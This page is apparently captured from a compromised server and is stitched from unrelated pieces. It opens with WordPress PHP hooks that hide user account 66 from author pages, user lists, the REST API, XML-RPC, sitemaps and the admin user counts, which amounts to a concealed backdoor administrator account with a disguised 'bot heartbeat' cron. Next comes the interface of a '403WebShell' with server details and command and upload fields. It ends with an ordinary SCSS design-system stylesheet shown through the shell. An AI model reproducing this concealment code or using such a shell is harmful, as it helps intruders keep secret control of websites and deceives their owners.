add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/futuresfunder/resources/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/futuresfunder/resources/css/app.scss
// =====================================================================
// European SF Funding — "Signal" Design System
// =====================================================================
// 1. Design tokens (SCSS) → mapped onto Bootstrap's theme variables so
//    every Bootstrap component (buttons, cards, badges, forms, navbar…)
//    adopts the cool signal palette automatically.
//    Sibling of palimory's app.scss (warm/atlas); same structure,
//    deliberately distinct palette.
// =====================================================================

$signal-paper:     #eef1f4; // page background (cool paper)
$signal-surface:   #f8fafc; // cards / raised surfaces
$signal-surface-2: #e5ebf1; // wells, card headers
$signal-ink:       #16283a; // headings & primary text (navy ink)
$signal-slate:     #48607a; // secondary text
$signal-blue:      #1f6fb2; // brand / primary action
$signal-blue-dark: #17578d;
$signal-teal:      #1f7a6d; // success / "open"
$signal-gold:      #b8860b; // accent — echoes the European Futures seal
$signal-muted:     #74839b; // labels / meta
$signal-border:    #cfd9e3; // cool hairline border

// ---- Bootstrap theme variables ----
$primary:   $signal-blue;
$secondary: $signal-slate;
$success:   $signal-teal;
$info:      #3a6ea5;
$warning:   #c98a1e;
$danger:    #b4452f;
$light:     $signal-surface;
$dark:      $signal-ink;

$body-bg:    $signal-paper;
$body-color: #2c3a47;

$font-family-sans-serif: 'Inter', system-ui, -apple-system, "Segoe UI", Roboto, "Helvetica Neue", sans-serif;
$font-family-serif: 'Spectral', Georgia, 'Times New Roman', serif;

$headings-font-family: 'Spectral', Georgia, serif;
$headings-font-weight: 600;
$headings-color: $signal-ink;

$link-color: $signal-blue-dark;
$link-hover-color: #114368;
$link-decoration: none;
$link-hover-decoration: underline;

$border-color: $signal-border;
$border-radius:    0.5rem;
$border-radius-sm: 0.375rem;
$border-radius-lg: 0.75rem;

$box-shadow-sm: 0 1px 2px 0 rgba(16, 32, 48, 0.06);
$box-shadow:    0 2px 6px -1px rgba(16, 32, 48, 0.10), 0 1px 3px -1px rgba(16, 32, 48, 0.07);
$box-shadow-lg: 0 18px 36px -14px rgba(16, 32, 48, 0.20);

$card-bg:           $signal-surface;
$card-border-color: $signal-border;
$card-cap-bg:       $signal-surface-2;

$navbar-light-color:        rgba($signal-ink, 0.82);
$navbar-light-hover-color:  $signal-blue-dark;
$navbar-light-active-color: $signal-ink;

$dropdown-bg:            $signal-surface;
$dropdown-border-color:  $signal-border;
$dropdown-link-hover-bg: $signal-surface-2;

// ---- Bootstrap ----
@import "bootstrap/scss/bootstrap";

// ---- Fonts ----
@import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=Spectral:ital,wght@0,400;0,500;0,600;0,700;1,400;1,500&display=swap');

// =====================================================================
// 2. CSS custom properties (mirror tokens for bespoke components)
// =====================================================================
:root {
    --signal-bg:        #{$signal-paper};
    --signal-surface:   #{$signal-surface};
    --signal-surface-2: #{$signal-surface-2};
    --signal-ink:       #{$signal-ink};
    --signal-slate:     #{$signal-slate};
    --signal-blue:      #{$signal-blue};
    --signal-blue-dark: #{$signal-blue-dark};
    --signal-teal:      #{$signal-teal};
    --signal-gold:      #{$signal-gold};
    --signal-muted:     #{$signal-muted};
    --signal-border:    #{$signal-border};
    --signal-line:      rgba(22, 40, 58, 0.08);
}

// =====================================================================
// 3. Base
// =====================================================================
body {
    min-height: 100vh;
    background-color: var(--signal-bg);
    -webkit-font-smoothing: antialiased;
}

::selection { background: rgba(31, 111, 178, 0.20); }

.display-serif { font-family: 'Spectral', Georgia, serif; }
.text-ink { color: var(--signal-ink) !important; }

// Uppercase eyebrow/label
.signal-eyebrow {
    display: inline-flex;
    align-items: center;
    gap: 0.7rem;
    color: var(--signal-blue);
    font-weight: 600;
    font-size: 0.82rem;
    letter-spacing: 0.14em;
    text-transform: uppercase;

    &::before {
        content: "";
        width: 30px;
        height: 2px;
        background: var(--signal-blue);
    }
}

// =====================================================================
// 4. Chrome — navbar + footer
// =====================================================================
.signal-navbar {
    background: rgba(238, 241, 244, 0.88);
    backdrop-filter: blur(8px);
    border-bottom: 1px solid var(--signal-border);

    .navbar-brand {
        display: flex;
        align-items: center;
        gap: 0.55rem;
        font-family: 'Spectral', Georgia, serif;
        font-weight: 600;
        font-size: 1.35rem;
        letter-spacing: -0.01em;
        color: var(--signal-ink);
    }

    .nav-link { font-weight: 500; }
    .nav-link.active { color: var(--signal-ink); font-weight: 600; }
}

.footer {
    background-color: var(--signal-surface);
    border-top: 1px solid var(--signal-border);
    color: var(--signal-slate);
    padding: 2.5rem 0;

    a {
        color: var(--signal-slate);
        &:hover { color: var(--signal-blue-dark); }
    }
}

// =====================================================================
// 5. Components
// =====================================================================
.card {
    border: 1px solid $card-border-color;
    box-shadow: $box-shadow-sm;
    transition: box-shadow 0.2s ease, transform 0.2s ease;

    &:hover { box-shadow: $box-shadow; }
}

.btn {
    font-weight: 600;
    --bs-btn-border-radius: 7px;
}
.btn-primary { color: #fff; }

.badge { font-weight: 500; }

// Program card hover
.program-card {
    transition: all 0.2s ease;

    &:hover {
        transform: translateY(-2px);
        .card-title a { color: var(--signal-blue-dark); }
    }
}

// Purpose / facet badges
.facet-badge {
    background: var(--signal-surface-2);
    color: var(--signal-slate);
    border: 1px solid var(--signal-border);
}

// Deadline badges
.deadline-open         { background-color: #d9e9e4; color: #1f7a6d; }
.deadline-closing-soon { background-color: #f3e6c8; color: #7a5713; }
.deadline-expired      { background-color: #e6e6e6; color: #6c757d; }
.deadline-rolling      { background-color: #dbe7f3; color: #17578d; }
.deadline-recurring    { background-color: #e4def2; color: #5b4a8a; }

// Moderation status badges
.status-pending  { background-color: #f3e6c8; color: #7a5713; }
.status-approved { background-color: #d9e9e4; color: #1f7a6d; }
.status-rejected { background-color: #f0d9d3; color: #b4452f; }

// Long-form programme description
.program-content {
    font-size: 1.05rem;
    line-height: 1.75;
    color: #34414d;

    p { margin-bottom: 1.25rem; }

    h1, h2, h3, h4, h5, h6 {
        font-family: $font-family-sans-serif;
        color: var(--signal-ink);
        margin-top: 1.75rem;
        margin-bottom: 0.75rem;
        font-size: 1.15rem;
        font-weight: 600;
    }

    blockquote {
        border-left: 4px solid var(--signal-blue);
        padding-left: 1.5rem;
        margin: 1.5rem 0;
        font-style: italic;
        color: var(--signal-slate);
    }
}

// Form controls
.form-control, .form-select {
    border-color: $signal-border;

    &:focus {
        border-color: var(--signal-blue);
        box-shadow: 0 0 0 3px rgba(31, 111, 178, 0.15);
    }
}

// Checkbox facet groups in the contribution form
.facet-checkbox-group {
    display: flex;
    flex-wrap: wrap;
    gap: 0.35rem 1.25rem;

    .form-check { min-width: 10rem; }
}

// "How it works" section on the start page
.signal-howto {
    background: var(--signal-surface);
    border: 1px solid var(--signal-border);
    border-radius: $border-radius-lg;
}

.signal-step {
    width: 42px;
    height: 42px;
    border-radius: 50%;
    border: 1.5px solid var(--signal-blue);
    color: var(--signal-blue-dark);
    background: var(--signal-surface);
    display: inline-flex;
    align-items: center;
    justify-content: center;
    font-family: 'Spectral', Georgia, serif;
    font-weight: 600;
    font-size: 1.15rem;
    flex: none;
}

// Experience cards
.experience-card {
    background: var(--signal-surface);
    border: 1px solid var(--signal-border);
    border-radius: $border-radius;
    padding: 1rem 1.25rem;

    &.experience-hidden { opacity: 0.55; border-style: dashed; }
}

.experience-kind {
    font-size: 0.72rem;
    font-weight: 600;
    letter-spacing: 0.1em;
    text-transform: uppercase;
    color: var(--signal-muted);
}

@media (max-width: 991.98px) {
    .signal-hero { padding-top: 1.5rem; }
}

Youez - 2016 - github.com/yon3zu
LinuXploit